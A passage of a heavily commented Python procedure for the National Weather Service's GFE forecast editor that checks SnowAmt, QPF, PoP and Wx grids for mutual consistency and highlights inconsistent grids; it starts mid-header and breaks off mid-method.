# 3. If QPF > 0, then at least one of the corresponding PoP grids must be > 0
# 4. If QPF > 0, then there are two cases:
# a. If the QPF grid is exactly 6 hours long and starts at 00, 06, 12, or 18
# UTC, then at least one of the corresponding Wx grids must have R, RW,
# S, SW, RS, IP, L, ZR, ZL.
# b. If the QPF grid does not adhere to the time constraints listed in the
# previous paragraph, then all corresponding Wx grids must contain a
# precipitating weather type. This more stringent test is required
# because with grids offset from the NDFD time constraints, it's
# possible for the GFE to evaluate grids as consistent using an "any"
# criteria but have the NDFD flag those same grids as inconsistent.
# For all of the checks above, if the initial threshold is not exceeded, then
# the two grids are consistent by definition. In other words:
# 1. If SnowAmt < 0.5, then SnowAmt and QPF are always consistent.
# 2. If SnowAmt < 0.1, then SnowAmt and Wx are always consistent.
# 3. If QPF = 0, then QPF and PoP are always consistent.
# 4. If QPF = 0, then QPF and Wx are always consistent.
# For the Wx checks above, only the Wx type is considered.
#
# ****** NOTE NOTE NOTE NOTE ******
# At this time, the check for two 6-hour QPF grids vs. one 12-hr PoP grid
# is not implemented because neither of those grid definitions is implemented
# in the GFE baseline. I don't know how to do a check on grids that don't
# exist.
# ****** NOTE NOTE NOTE NOTE ******
#
# If discrepancies are found, then the "bad" grids will be highlighted.
# Temporary grids showing where the discrepancies occur will be created and
# also highlighted.
#
# Dealing with QPF and SnowAmt is always a pain, because they are "cumulative"
# elements. This procedure will account for the possibility that the SnowAmt and
# QPF grids are not the same duration. It will also account for the possibilty
# that the SnowAmt and QPF grids are not aligned on either or both ends.
# The only sane way to handle either situation is to believe that the QPF
# accumulation happens uniformally across the grid's duration and to use
# the proportional amount of the QPF that corresponds the SnowAmt grid's
# duration. Some examples:
# 1. The QPF grid is 3 hours long and there are 3, 1-hour, SnowAmt grids.
# Each SnowAmt grid will be compared to 1/3 the value of the QPF grid.
# 2. The last two hours of a 3-hour QPF grid overlaps a 2-hour SnowAmt grid.
# The SnowAmt grid will be compared to 2/3 the value of the QPF grid.
# 3. Two 3-hour QPF grids align with one 6-hour SnowAmt grid. The first QPF
# grid will be compared to the SnowAmt grid. If the consistency check passes
# on that comparison, the program will continue. If the consistency check
# fails, then the sum of the two QPF grids will be compared to the SnowAmt
# grid.
# 4. The last four hours of a 6-hour QPF grid and the first two hours of a
# 3-hour QPF grid overlap a 6-hour SnowAmt grid. The SnowAmt grid will be
# compared to 2/3 of the first QPF grid. If the consistency check passes,
# the program will continue. If the consistency check fails, then 2/3 of the
# first QPF grid will be added to 2/3 of the second QPF grid and that QPF
# sum will be compared against the SnowAmt grid.
#
# Confused yet? Of course, all of these gyrations can be avoided if the
# QPF and SnowAmt grids are aligned and of the same duration.
#
# Unfortunately, the GFE does not provide a way to deal with proportional
# amounts of the accumulative grids, so I have done this.
#
# I've written this code such that it's optimized to minimize memory usage
# (at least I think I've done that). As a result, it's not particularly
# optimized for ifpServer database access. In fact, I retrieve the various
# grids from the ifpServer database many times during the procedure's run.
# This will have an impact on how fast the procedure runs (it'll run slower
# than if I had optimized for ifpServer database access). The choice to favor
# memory optimization comes from my belief that there are still "memory leak"
# problems in the GFE and that the consequences of those problems will be most
# manifest when this procedure is most likely to be run (near the end of the
# shift). Funky memory problems are a prime cause of funky application
# behavior like application crashes or spontaneous logouts. So, this procedure
# basically reads a grid into memory, keeps it as long as it's needed, and
# then discards it.
#
# Finally, this procedure is also intended to provide an example to other
# developers of how to write and document code. I have reservations as to how
# well I've succeeded at that task. The code is heavily documented, probably
# excessively so. Also, it's not as well as organized as it could be. As you
# look through the various methods, it should become quickly apparent that
# there is a lot of repeated code. I've consciously left the code this way in
# the hopes that it will be easier to understand by more novice programmers
# and because the code hasn't quite grown to the point where updating the
# repeating code is onerous or overly error-prone. It would be better to
# capture the repeating code in separate methods, but keeping track of the
# where you are in the code becomes harder the more you have to jump around
# from method to method. As with all things, there are trade-offs involved.
# ----------------------------------------------------------------------------
##
# This is an absolute override file, indicating that a higher priority version
# of the file will completely replace a lower priority version of the file.
##
MenuItems = ["Consistency"]
VariableList = []
VariableList.append(('Check_Cleanup', 'Check', 'radio', ['Check', 'Cleanup']))
VariableList.append(('Run SnowAmt/QPF Check?', ['Yes'], 'check', ['Yes']))
VariableList.append(('Run SnowAmt/Wx Check?', ['Yes'], 'check', ['Yes']))
VariableList.append(('Run QPF/PoP Check?', ['Yes'], 'check', ['Yes']))
VariableList.append(('Run QPF/Wx Check?', ['Yes'], 'check', ['Yes']))
VariableList.append(('If "Cleanup" is selected, then only cleanup actions will run.\nNo checks will be made, regardless of the above settings.', '', 'label'))
#### Config section
# Both the QPF and SnowAmt grids have values which are floating point
# numbers. This means comparisons must use a tolerance value. In other
# words, 0.5 may be represented in machine numbers as 0.49999999999 or
# 0.500000000001. By specifying a tolerance value, we account for the
# vagaries of machine representation of floating point numbers while
# keeping the precision of the comparisons to acceptable levels. Depending
# on the comparison being done, the tolerance value will be added to or
# subtracted from the comparison value to allow for machine error in the
# floating point number representation.
# By default in the GFE, QPF precision is to the nearest one-hundredth while
# SnowAmt precision is to the nearest tenth.
qpfTol = 0.00001 # 1/100,000 tolerance vs 1/100 precision
snowAmtTol = 0.0001 # 1/10,000 tolerance vs 1/10 precision
# Inconsistent grid highlight color. One size fits all. To turn off
# highlighting, set the variable to the empty string, ''.
inconGridColor = 'red'
# Temporary grid highlight color. One size fits all. To turn off highlighting,
# set the variable to the empty string, ''.
tempGridColor = 'orange'
# Name of CWA edit area to use instead of running the procedure over the
# whole domain. Set to the empty string, '', if you want the procedure to
# always run over the whole domain. If the procedure has a problem with the
# edit area you provide, it will run over the whole domain. You should probably
# choose an edit area that is slightly larger than your entire CWA. It's
# possible that when mapping your GFE grids to NDFD grids that the NDFD thinks
# some GFE grid cells are in your CWA that the GFE does not think are in your
# CWA. Using an edit area slightly larger than the CWA, like the ISC_Send_Area
# which is the mask used when sending grids to the NDFD, should eliminate the
# possibibilty of the NDFD intermittently flagging CWA border "points" as
# inconsistent. Note: running the procedure over a subset of the entire GFE
# domain does not really provide any performance gains. Given the way the
# underlying array data structure works, calculations are almost always made
# at every single grid point first and then a mask is applied to limit the
# meaningful results to the edit area. For the purposes of this procedure, the
# values outside the edit area are set to the appropriate "consistent" result.
# The real benefit of this option is it limits the inconsistent results to the
# areas the forecaster really cares about, which should lessen the workload of
# using this procedure. Marine Offices: Make sure the edit area provided
# includes your marine zones.
cwaEditArea = 'ISC_Send_Area'
#### Config section end
import SmartScript
from numpy import *
class Procedure (SmartScript.SmartScript):
def __init__(self, dbss):
SmartScript.SmartScript.__init__(self, dbss)
def __cleanup(self, timeRange):
# Remove any temporary grids created previously.
for element in (
'SnowAmtQPFInconsistent', 'SnowAmtWxInconsistent',
'QPFPoPInconsistent', 'QPFWxInconsistent'):
try:
# From SmartScript
self.unloadWE('Fcst', element, 'SFC')
except:
# A failure is almost certainly no grids to unload.
pass
# Turn off any highlights. From SmartScript
self.highlightGrids('Fcst', 'SnowAmt', 'SFC', timeRange, inconGridColor, on=0)
self.highlightGrids('Fcst', 'QPF', 'SFC', timeRange, inconGridColor, on=0)
self.highlightGrids('Fcst', 'Wx', 'SFC', timeRange, inconGridColor, on=0)
self.highlightGrids('Fcst', 'PoP', 'SFC', timeRange, inconGridColor, on=0)
return
def __checkConfigValueTypes(self):
import types
message = ''
badValues = False
if not type(inconGridColor) is types.StringType:
message = '%sThe "inconGridColor" variable is not defined as a string value. Please contact your IFPS focal point to fix this problem.\n' % message
badValues = True
if not type(tempGridColor) is types.StringType:
message = '%sThe "tempGridColor" variable is not defined as a string value. Please contact your IFPS focal point to fix this problem.\n' % message
badValues = True
if not type(cwaEditArea) is types.StringType:
message = '%sThe "cwaEditArea" variable is not defined as a string value. Please contact your IFPS focal point to fix this problem.\n' % message
badValues = True
if badValues:
message = '%sYou will not be able to run the procedure until the problem is corrected.' % message
# The next two commands are from SmartScript
self.statusBarMsg(message, 'U')
self.cancel()
return
def _runSnowAmtQPFCheck(self, timeRange):
# This method implements the check that if SnowAmt >= 0.5, then
# QPF must be >= 0.01.
# There can be a significant difference between the values stored
# in memory and the values returned from the database. This is because
# when values are saved, the element's precision (as defined in
# serverConfig.py/localConfig.py) is enforced. Values in memory do not
# have the element's precision enforced; in fact, they have the
# machine precision of the underlying data type.
# If there are locks, post an urgent message and return from the method.
message = ''
# lockedByMe is from SmartScript
if self.lockedByMe('QPF', 'SFC'):
message = '%sYou have the QPF grid locked. Please save the QPF grid.\n' % message
if self.lockedByMe('SnowAmt', 'SFC'):
message = '%sYou have the SnowAmt grid locked. Please save the SnowAmt grid.\n' % message
# lockedByOther is from SmartScript
if self.lockedByOther('QPF', 'SFC'):
message = '%sThe QPF grid is locked by someone else. Please have that person save the QPF grid.\n' % message
if self.lockedByOther('SnowAmt', 'SFC'):
message = '%sThe SnowAmt grid is locked by someone else. Please have that person save the SnowAmt grid.\n' % message
if message:
message = '%sThe SnowAmt/QPF Check was not run.' % message
self.statusBarMsg(message, 'U')
# I return instead of aborting because the user may have asked for
# other tests that do not have locked grid problems.
return
# Make sure there are actually SnowAmt grids in the time range.
# The self.getGrids command will return None if there are no grids
# in the time range for mode='First' and noDataError=0. The None
# variable cannot be iterated over. Rather than trap in a try/except,
# I'll just check for the condititon. This may not be the most
# Pythonic way of doing things, but it allows me to avoid having
# a bunch of code indented beneath a try statement. If no SnowAmt
# grids are found, post an urgent message and return from the method.
# getGrids is from SmartScript
snowAmtInfoList = self.getGridInfo('Fcst', 'SnowAmt', 'SFC', timeRange)
if [] == snowAmtInfoList:
message = 'There are no SnowAmt grids in the time range you selected.\nThe SnowAmt/QPF Check did not run.'
self.statusBarMsg(message, 'U')
# I return instead of aborting because the user may have asked for
# other tests that do not have missing grid problems.
return
# getGridInfo is from SmartScript
# One might ask why I don't just return the result of self.getGrids
# to a variable and iterate over that. I'm trying to minimize the
# memory footprint of the procedure. Reading all the grids into a
# variable could be a fairly large memory hit. The construct below
# only reads one SnowAmt grid at a time into memory, the one that's
# being checked. By using the cache=0 switch on all the self.getGrids
# command, I prevent the GFE from saving the grids into memory for me.
# The Python builtin command enumerate loops over an iterable object
# and returns a 2-tuple containing the current index of the
# iteration and the object at that index. In cases where I need
# both the index and the object, I think this construct is more
# elegant than:
# for i in xrange(len(iterableObject)):
# object = iterableObject[i]
snowAmtGrids = self.getGrids('Fcst', 'SnowAmt', 'SFC',
timeRange, mode='List', noDataError=0,cache=0)
for snowAmtIndex, snowAmtGrid in enumerate(snowAmtGrids):
# greater_equal is from Numeric. For the given array and
# threshold, a new array of the same dimensions as the input
# array is returned. The new array has the value 1 where the
# input array was greater than or equal to the threshold and
# has the value 0 elsewhere.
halfInchMask = greater_equal(snowAmtGrid, 0.5 - snowAmtTol)
gridTR = snowAmtInfoList[snowAmtIndex].gridTime()
# zeros is from Numeric. It creates an array of all zeros for
# the given dimensions and numeric type.
qpfSum = self.empty()
qpfGrids = self.getGrids(
'Fcst', 'QPF', 'SFC', gridTR, mode='List', noDataError=0,
cache=0)
if qpfGrids is None:
message = '''There are no QPF grids in time range %s.
The SnowAmt/QPF Check skipped the time range.''' % gridTR
self.statusBarMsg(message, 'U')
continue
qpfInfoList = self.getGridInfo('Fcst', 'QPF', 'SFC', gridTR)
for qpfIndex, qpfGrid in enumerate(qpfGrids):
snowAmtGridStartTime = gridTR.startTime().unixTime()
qpfGridTR = qpfInfoList[qpfIndex].gridTime()
qpfGridStartTime = qpfGridTR.startTime().unixTime()
fraction = 1.0
if qpfGridStartTime < snowAmtGridStartTime:
diff = snowAmtGridStartTime - qpfGridStartTime
fraction -= (float(diff) / qpfGridTR.duration())
snowAmtGridEndTime = gridTR.endTime().unixTime()
qpfGridEndTime = qpfGridTR.endTime().unixTime()
if qpfGridEndTime > snowAmtGridEndTime:
diff = qpfGridEndTime - snowAmtGridEndTime
fraction -= (float(diff) / qpfGridTR.duration())
# For some reason, the construct:
# qpfSum = qpfSum + (qpfGrid * fraction)
# doesn't assign the expression evaluation back to qpfSum.
# Thus, I use a temporary variable.
qpfTemp = qpfSum + (qpfGrid * fraction)
qpfSum = qpfTemp
del qpfTemp
# less is from Numeric. It behaves analogously to greater_equal,
# described above.
qpfMask = less(qpfSum, 0.01 + qpfTol)
# The following is the "truth" table for the logical
# comparison.
# SnowAmt >= 0.5, 1; SnowAmt < 0.5, 0
# QPF < 0.01, 1; QPF >= 0.01, 0
# SnowAmt >= 0.5 (1) and QPF < 0.01 (1) = 1 (Bad result)
# SnowAmt >= 0.5 (1) and QPF >= 0.01 (0) = 0 (Good result)
# SnowAmt < 0.5 (0) and QPF < 0.01 (1) = 0 (Good result)
# SnowAmt < 0.5 (0) and QPF >= 0.01 (0) = 0 (Good result)
# logical_and is from Numeric
consistMask = logical_and(halfInchMask, qpfMask)
# Now, apply the CWA mask. There's an assumption here that
# all offices will use a mask and provide a valid one, which
# means this step does something meaningful. If that assumption
# does not hold, then the next statement doesn't actually
# change anything, even though each and every grid point has a
# comparison check made.
# where is from Numeric. The first argument is a mask.
# The second argument is/are the value/values to use at the
# array points where the mask is one. The third argument
# is/are the value/values to use at the array points
# where the mask is zero. For this comparison, I want
# the values of consistMask where self.cwaMask is one and
# I want the "good result", which is zero, where
# self.cwaMask is zero.
consistMask[logical_not(self.cwaMask)] = 0
# ravel and sometrue are from Numeric.
if not sometrue(ravel(consistMask)):
# This is the good result, even though it may not be
# intuitive. The ravel function reduces the rank of the
# array by one. Since we had a 2-d array, the ravel
# function creates a 1-d array (a vector) such that
# reading the 2-d array from left-to-right, top-to-
# bottom returns the same values as reading the 1-d
# array from left-to-right. The sometrue function
# performs a logical or on subsequent element pairs
# in the 1-d array and returns the final result. If
# there's no inconsistency, the result will be 0.
# Thus, negating the sometrue result gives us the
# positive outcome. Phew.
# Since QPF is an accumulative element, we don't need
# to continue the loop once the QPF sum meets the
# threshold.
break
else:
# This block will only execute if the for loop runs to
# completion, i.e., the break statement is not executed.
# So, if we get here, we have an inconsistency and need to
# highlight the appropriate grids.
if inconGridColor:
self.highlightGrids(
'Fcst', 'SnowAmt', 'SFC', gridTR, inconGridColor)
self.highlightGrids(
'Fcst', 'QPF', 'SFC', gridTR, inconGridColor)
# createGrid is from SmartScript
# Since this block of code only executes if the for loop
# runs to completion, then the value of consistMask from
# the for loop will contain all of the inconsistencies.
self.createGrid(
'Fcst', 'SnowAmtQPFInconsistent', 'SCALAR', consistMask,
gridTR, descriptiveName='SnowAmtQPFInconsistent',
minAllowedValue=0, maxAllowedValue=1, units='Good/Bad')
if tempGridColor:
self.highlightGrids(
'Fcst', 'SnowAmtQPFInconsistent', 'SFC', gridTR,
tempGridColor)
self.inconsistent = True
# While not required, I like to terminate my methods with a return
# statement to make it clear this is where the method ends.
return
def _runSnowAmtWxCheck(self, timeRange):
# This implements the check that if SnowAmt >= 0.1, then the Wx grid
# must contain S, SW, or IP, regardless of whether or not there is
# any freezing or liquid types. Finally, the check does not look at
# anything other than the Wx type. In other words, the check will be
# okay if SnowAmt != 0 and Wx has Chc:S:- or Def:SW:-- or Lkly:S:+.
# There can be a significant difference between the values stored
# in memory and the values returned from the database. This is because
# when values are saved, the element's precision (as defined in
# serverConfig.py/localConfig.py) is enforced. Values in memory do not
# have the element's precision enforced; in fact, they have the
# machine precision of the underlying data type.
# If there are locks, post an urgent message and return from the method.
message = ''
# lockedByMe is from SmartScript
if self.lockedByMe('Wx', 'SFC'):
message = '%sYou have the Wx grid locked. Please save the Wx grid.\n' % message
if self.lockedByMe('SnowAmt', 'SFC'):
message = '%sYou have the SnowAmt grid locked. Please save the SnowAmt grid.\n' % message
# lockedByOther is from SmartScript
if self.lockedByOther('Wx', 'SFC'):
message = '%sThe Wx grid is locked by someone else. Please have that person save the Wx grid.\n' % message
if self.lockedByOther('SnowAmt', 'SFC'):
message = '%sThe SnowAmt grid is locked by someone else. Please have that person save the SnowAmt grid.\n' % message
if message:
message = '%sThe SnowAmt/Wx Check was not run.' % message
self.statusBarMsg(message, 'U')
# I return instead of aborting because the user may have asked for
# other tests that do not have locked grid problems.
return
# Make sure there are actually SnowAmt grids in the time range.
# The self.getGrids command will return None if there are no grids
# in the time range for noDataError=0. The None
# variable cannot be iterated over. Rather than trap in a try/except,
# I'll just check for the condititon. This may not be the most
# Pythonic way of doing things, but it allows me to avoid having
# a bunch of code indented beneath a try statement. If no SnowAmt
# grids are found, post an urgent message and return from the method.
# getGrids is from SmartScript
snowAmtInfoList = self.getGridInfo('Fcst', 'SnowAmt', 'SFC', timeRange)
if [] == snowAmtInfoList:
message = 'There are no SnowAmt grids in the time range you selected.\nThe SnowAmt/Wx Check did not run.'
self.statusBarMsg(message, 'U')
# I return instead of aborting because the user may have asked for
# other tests that do not have missing grid problems.
return
snowAmtGrids = self.getGrids(
'Fcst', 'SnowAmt', 'SFC', timeRange, mode='List', noDataError=0,
cache=0)
for snowAmtIndex, snowAmtGrid in enumerate(snowAmtGrids):
nonZeroMask = greater_equal(snowAmtGrid, 0.1 - snowAmtTol)
gridTR = snowAmtInfoList[snowAmtIndex].gridTime()
wxInfoList = self.getGridInfo('Fcst', 'Wx', 'SFC', gridTR)
if [] == wxInfoList:
message = '''There are no Wx grids in time range %s.
The SnowAmt/Wx Check skipped the time range.''' % gridTR
self.statusBarMsg(message, 'U')
continue
# There are two cases, which I'll capture in individual methods
# If the SnowAmt grid is exactly 6 hours long and starts at
# 00, 06, 12, or 18 UTC, then only one overlapping Wx grid needs
# to match. Otherwise, all overlapping Wx grids need to match.
if gridTR.duration() / 3600 == 6 and \
gridTR.startTime().hour in (0, 6, 12, 18):
self._snowAmtWxCheckLocked(nonZeroMask, gridTR, wxInfoList)
else:
self._snowAmtWxCheckUnlocked(nonZeroMask, gridTR, wxInfoList)
return
def _snowAmtWxCheckLocked(self, nonZeroMask, gridTR, wxInfoList):
# The "Locked" comes from the idea that if the SnowAmt grid meets
# the duration and start time constraints, then it's been "locked".
# I need to capture the consistency masks for each individual Wx grid
# just in case I end up with inconsistencies.
consistMaskList = []
for wxIndex, wxGrid in enumerate(self.getGrids(
'Fcst', 'Wx', 'SFC', gridTR, mode='List', noDataError=0,
cache=0)):
# wxMask is from SmartScript
sMask = self.wxMask(wxGrid, ':S:')
swMask = self.wxMask(wxGrid, ':SW:')
ipMask = self.wxMask(wxGrid, ':IP:')
snowMask = logical_or(logical_or(sMask, swMask), ipMask)
del (sMask, swMask, ipMask)
wxMask = logical_not(snowMask)
# "Truth" table for the logical comparison follows
# SnowAmt >= 0.1, 1; SnowAmt < 0.1, 0
# Wx has S, SW, or IP, 0; Wx doesn't have S, SW, or IP, 1
# SnowAmt >= 0.1 (1) and Wx has (0) = 0 (Good result)
# SnowAmt >= 0.1 (1) and Wx doesn't have (1) = 1 (Bad result)
# SnowAmt < 0.1 (0) and Wx has (0) = 0 (Good result)
# SnowAmt < 0.1 (0) and Wx doesn't have (1) = 0 (Good result)
#
consistMask = logical_and(nonZeroMask, wxMask)
consistMask[logical_not(self.cwaMask)] = 0
consistMaskList.append(consistMask)
if not sometrue(ravel(consistMask)):
# There were no inconsistencies with this Wx grid. Since only
# one needs to be consistent, we don't need to do any more
# checks.
break
else:
# This block will only execute if the for loop runs to
# completion, i.e., the break statement is not executed.
# So, if we get here, we have an inconsistency and need to
# highlight the appropriate grids.
if inconGridColor:
self.highlightGrids(
'Fcst', 'SnowAmt', 'SFC', gridTR, inconGridColor)
self.highlightGrids(
'Fcst', 'Wx', 'SFC', gridTR, inconGridColor)
# createGrid is from SmartScript
for index in xrange(len(wxInfoList)):
# Create temporary grids for each Wx grid. Limit the start and
# end times of the temporary grids so that they don't extend
# beyond the start and end times of the corresponding SnowAmt
# grid.
wxGridTR = wxInfoList[index].gridTime()
tempGridStartTime = wxGridTR.startTime().unixTime()
if tempGridStartTime < gridTR.startTime().unixTime():
tempGridStartTime = gridTR.startTime().unixTime()
tempGridEndTime = wxGridTR.endTime().unixTime()
if tempGridEndTime > gridTR.endTime().unixTime():
tempGridEndTime = gridTR.endTime().unixTime()
tempGridDur = (tempGridEndTime - tempGridStartTime) / 3600
offset = (tempGridStartTime - \
self.timeRange0_1.startTime().unixTime()) / 3600
# Because the time range may be different for the temporary
# grid, I need to create and use that time range when
# creating the temporary grid.
tempGridTR = self.createTimeRange(
offset, offset+tempGridDur, 'Zulu')
self.createGrid(
'Fcst', 'SnowAmtWxInconsistent', 'SCALAR',
consistMaskList[index], tempGridTR,
descriptiveName='SnowAmtWxInconsistent',
minAllowedValue=0, maxAllowedValue=1, units='Good/Bad')
if tempGridColor:
self.highlightGrids(
'Fcst', 'SnowAmtWxInconsistent', 'SFC', gridTR,
tempGridColor)
self.inconsistent = True
return
def _snowAmtWxCheckUnlocked(self, nonZeroMask, gridTR, wxInfoList):
# The "Unlocked" comes from the idea that if the SnowAmt grid does
# not meet the duration and start time constraints, then it's been
# left "unlocked".
for wxIndex, wxGrid in enumerate(self.getGrids(
'Fcst', 'Wx', 'SFC', gridTR, mode='List', noDataError=0,
cache=0)):
# wxMask is from SmartScript
sMask = self.wxMask(wxGrid, ':S:')
swMask = self.wxMask(wxGrid, ':SW:')
ipMask = self.wxMask(wxGrid, ':IP:')
snowMask = logical_or(logical_or(sMask, swMask), ipMask)
del (sMask, swMask, ipMask)
wxMask = logical_not(snowMask)
# "Truth" table for the logical comparison follows
# SnowAmt >= 0.1, 1; SnowAmt < 0.1, 0
# Wx has S, SW, or IP, 0; Wx doesn't have S, SW, or IP, 1
# SnowAmt >= 0.1 (1) and Wx has (0) = 0 (Good result)
# SnowAmt >= 0.1 (1) and Wx doesn't have (1) = 1 (Bad result)
# SnowAmt < 0.1 (0) and Wx has (0) = 0 (Good result)
# SnowAmt < 0.1 (0) and Wx doesn't have (1) = 0 (Good result)
#
# All Wx grids overlapping the SnowAmt grid must be consistent.
consistMask = logical_and(nonZeroMask, wxMask)
consistMask[logical_not(self.cwaMask)] = 0
if sometrue(ravel(consistMask)):
# I'll highlight the SnowAmt grids and Wx grids in
# gridTR as I did with QPF. However, I'll make
# temporary grids here using the Wx grid's time
# range but, the temporary grid cannot start before
# the start of the corresponding SnowAmt grid nor can
# it end after the end of the corresponding SnowAmt grid.
wxGridTR = wxInfoList[wxIndex].gridTime()
tempGridStartTime = wxGridTR.startTime().unixTime()
if tempGridStartTime < gridTR.startTime().unixTime():
# Clip to start of SnowAmt grid
tempGridStartTime = gridTR.startTime().unixTime()
tempGridEndTime = wxGridTR.endTime().unixTime()
if tempGridEndTime > gridTR.endTime().unixTime():
# Clip to end of SnowAmtGrid
tempGridEndTime = gridTR.endTime().unixTime()
tempGridDur = (tempGridEndTime - tempGridStartTime) / 3600
offset = (tempGridStartTime - \
self.timeRange0_1.startTime().unixTime()) / 3600
# Since either the front or end of the Wx grid's
# time range may have been clipped, create a time
# range using those values.
tempGridTR = self.createTimeRange(
offset, offset+tempGridDur, 'Zulu')
self.createGrid(
'Fcst', 'SnowAmtWxInconsistent', 'SCALAR', consistMask,
tempGridTR, descriptiveName='SnowAmtWxInconsistent',
minAllowedValue=0, maxAllowedValue=1, units='Good/Bad')
if tempGridColor:
self.highlightGrids(
'Fcst', 'SnowAmtWxInconsistent', 'SFC', gridTR,
tempGridColor)
if inconGridColor:
self.highlightGrids(
'Fcst', 'SnowAmt', 'SFC', gridTR, inconGridColor)
self.highlightGrids(
'Fcst', 'Wx', 'SFC', wxGridTR, inconGridColor)
self.inconsistent = True
return
def _runQPFPoPCheck(self, timeRange):
# This method implements the check that if any QPF grid is non zero
# then one of the corresponding floating PoP grids must also be non
# zero.
# There can be a significant difference between the values stored
# in memory and the values returned from the database. This is because
# when values are saved, the element's precision (as defined in
# serverConfig.py/localConfig.py) is enforced. Values in memory do not
# have the element's precision enforced; in fact, they have the
# machine precision of the underlying data type.
# If there are locks, post an urgent message and return from the method.
message = ''
# lockedByMe is from SmartScript
if self.lockedByMe('QPF', 'SFC'):
message = '%sYou have the QPF grid locked. Please save the QPF grid.\n' % message
if self.lockedByMe('PoP', 'SFC'):
message = '%sYou have the PoP grid locked. Please save the PoP grid.\n' % message
# lockedByOther is from SmartScript
if self.lockedByOther('QPF', 'SFC'):
message = '%sThe QPF grid is locked by someone else. Please have that person save the QPF grid.\n' % message
if self.lockedByOther('PoP', 'SFC'):
message = '%sThe PoP grid is locked by someone else. Please have that person save the PoP grid.\n' % message
if message:
message = '%sThe QPF/PoP Check was not run.' % message
self.statusBarMsg(message, 'U')
# I return instead of aborting because the user may have asked for
# other tests that do not have locked grid problems.
return
# Make sure there are actually QPF grids in the time range.
# The self.getGrids command will return None if there are no grids
# in the time range for mode='First' and noDataError=0. The None
# variable cannot be iterated over. Rather than trap in a try/except,
# I'll just check for the condititon. This may not be the most
# Pythonic way of doing things, but it allows me to avoid having
# a bunch of code indented beneath a try statement. If no SnowAmt
# grids are found, post an urgent message and return from the method.
# getGrids is from SmartScript
qpfInfoList = self.getGridInfo('Fcst', 'QPF', 'SFC', timeRange)
if [] == qpfInfoList:
message = 'There are no QPF grids in the time range you selected.\nThe QPF/PoP Check did not run.'
self.statusBarMsg(message, 'U')
# I return instead of aborting because the user may have asked for
# other tests that do not have missing grid problems.
return
qpfGrids = self.getGrids(
'Fcst', 'QPF', 'SFC', timeRange, mode='List', noDataError=0,
cache=0)
for qpfIndex, qpfGrid in enumerate(qpfGrids):
gridTR = qpfInfoList[qpfIndex].gridTime()
popGrid = self.getGrids(
'Fcst', 'PoP', 'SFC', gridTR, mode='Max', noDataError=0,
cache=0)
if popGrid is None:
message = '''There are no PoP grids in time range %s.
The QPF/PoP Check skipped the time range.''' % gridTR
self.statusBarMsg(message, 'U')
continue
qpfNonZeroMask = greater(qpfGrid, qpfTol)
popZeroMask = equal(popGrid, 0)
# popZeroMask = 1 if PoP = 0; popZeroMask = 0 if PoP != 0
# qpfNonZeroMask = 1 if QPF > 0; qpfNonZeroMask = 0 if QPF = 0
# PoP = 0 (1) and QPF = 0 (0) => 0 (Good result)
# PoP != 0 (0) and QPF = 0 (0) => 0 (Good result)
# PoP != 0 (0) and QPF > 0 (1) => 0 (Good result)
# PoP = 0 (1) and QPF > 0 (1) => 1 (Bad result)
consistMask = logical_and(qpfNonZeroMask, popZeroMask)
consistMask[logical_not(self.cwaMask)] = 0
if sometrue(ravel(consistMask)):
# The good result is if the logical_and returns zeros
# for every grid point, that is "none true". So, if
# the sometrue method evaluates True, there are
# inconsistencies.
self.createGrid(
'Fcst', 'QPFPoPInconsistent', 'SCALAR', consistMask, gridTR,
descriptiveName='QPFPoPInconsistent',
minAllowedValue=0, maxAllowedValue=1, units='Good/Bad')
if tempGridColor:
self.highlightGrids(
'Fcst', 'QPFPoPInconsistent', 'SFC', gridTR,
tempGridColor)
if inconGridColor:
self.highlightGrids(
'Fcst', 'QPF', 'SFC', gridTR, inconGridColor)
self.highlightGrids(
'Fcst', 'PoP', 'SFC', gridTR, inconGridColor)
self.inconsistent = True
##### Edited by Rob Radzanowski (WFO-CTP) 03-16-2009 to add missing NDFD check for QPF=0 & PoP > 50
##### which is causing unexplained yellow banners due to lack of checking for this error.
qpfZeroMask = equal(qpfGrid, 0)
popGrid = self.getGrids(
'Fcst', 'PoP', 'SFC', gridTR, mode='Max', noDataError=0, cache=0)
popGreater50Mask = greater(popGrid, 50)
# popGreater50Mask = 1 if PoP > 50; popGreater50Mask = 0 if PoP <= 50
# qpfZeroMask = 0 if QPF > 0; qpfZeroMask = 1 if QPF = 0
# PoP > 50 (1) and QPF > 0 (0) => 0 (Good result)
# PoP > 50 (1) and QPF = 0 (1) => 1 (Bad result)
# PoP <= 50 (0) and QPF > 0 (0) => 0 (Good/Irrelevant result)
# PoP <= 50 (0) and QPF = 0 (1) => 0 (Good result)
consistMask2 = logical_and(qpfZeroMask, popGreater50Mask)
consistMask2[logical_not(self.cwaMask)] = 0
if sometrue(ravel(consistMask2)):
# The good result is if the logical_and returns zeros
# for every grid point, that is "none true". So, if
# the sometrue method evaluates True, there are
# inconsistencies.
self.createGrid(
'Fcst', 'QPFPoPInconsistent', 'SCALAR', consistMask2, gridTR,
descriptiveName='QPFPoPInconsistent',
minAllowedValue=0, maxAllowedValue=1, units='Good/Bad')
if tempGridColor:
self.highlightGrids('Fcst', 'QPFPoPInconsistent', 'SFC', gridTR, tempGridColor)
if inconGridColor:
self.highlightGrids('Fcst', 'QPF', 'SFC', gridTR, inconGridColor)
self.highlightGrids('Fcst', 'PoP', 'SFC', gridTR, inconGridColor)
self.inconsistent = True
return
def _runQPFWxCheck(self, timeRange):
# This method implements the check that if QPF non zero, then the
# corresponding Wx grids must contain a precipitable Wx type. Note:
# the method only checks the Wx type, no cov/prob, no inten, etc.
# There can be a significant difference between the values stored
# in memory and the values returned from the database. This is because
# when values are saved, the element's precision (as defined in
# serverConfig.py/localConfig.py) is enforced. Values in memory do not
# have the element's precision enforced; in fact, they have the
# machine precision of the underlying data type.
# If there are locks, post an urgent message and return from the method.
message = ''
# lockedByMe is from SmartScript
if self.lockedByMe('QPF', 'SFC'):
message = '%sYou have the QPF grid locked. Please save the QPF grid.\n' % message
if self.lockedByMe('Wx', 'SFC'):
message = '%sYou have the Wx grid locked. Please save the Wx grid.\n' % message
# lockedByOther is from SmartScript
if self.lockedByOther('QPF', 'SFC'):
message = '%sThe QPF grid is locked by someone else. Please have that person save the QPF grid.\n' % message
if self.lockedByOther('Wx', 'SFC'):
message = '%sThe Wx grid is locked by someone else. Please have that person save the Wx grid.\n' % message
if message:
message = '%sThe QPF/Wx Check was not run.' % message
self.statusBarMsg(message, 'U')
# I return instead of aborting because the user may have asked for
# other tests that do not have locked grid problems.
return
# Make sure there are actually QPF grids in the time range.
# I'll just check for the condititon. If no SnowAmt
# grids are found, post an urgent message and return from the method.
